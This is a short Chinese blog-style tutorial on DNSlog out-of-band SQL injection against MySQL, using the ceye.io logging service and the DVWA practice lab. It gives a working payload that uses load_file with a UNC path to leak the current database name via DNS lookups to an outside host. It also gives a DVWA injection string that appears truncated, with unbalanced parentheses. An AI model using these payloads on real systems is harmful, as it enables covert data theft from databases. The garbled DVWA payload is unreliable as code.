• 微信公众号:美女很有趣。 工作之余,放松一下,关注即送10G+美女照片!

DNSlog注⼊利⽤(MYSQL)

开发技术 开发技术 2周前 (05-03) 10次浏览

一、是什么?

  DNSLog ⽤于监测 DNS 和 HTTP 访问记录,可通过HTTP请求,让⽬标主机主动请求 DNSLog API 地址,有相应的解析记录,则可判定为存在相应的漏洞。

二、应用场景

  简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。

三、DNS网址

  ceye.io   提供DNSlog、HTTP等的查询服务

  sso.telnet404.com  注册网址

 

四、基本步骤

  1.复制个人标识符XXX.ceye.io,替换语句,回车之后有延迟表示成功访问

  2.在ceye.io网站查看解析

五、语句 

    核心:select load_file(concat(‘\\’,hex((select database())),’.XXX.ceye.io\abv’)); //hex是为了避免出现-,/等特殊字符

六、DVWA实战

   实际应用的时候,直接用核心语句肯定是不行的,需要先做好信息收集,根据网站源代码进行具体的分析与构建语句,比如判断、闭合与注释什么的的。

  语句:1′ and if((select schema_name from information_schema.schemata limit 0,1)),’.XXX.ceye.io\abv’))),1,0) And ‘1’=’1 //两条语句可以用and操作符连接,但是and 与select不能直接连接,所以需要if函来承接,返回结果不重要,执行语句最重要。

   

    

    

  


程序员灯塔
转载请注明原文链接:DNSlog注⼊利⽤(MYSQL)
喜欢 (0)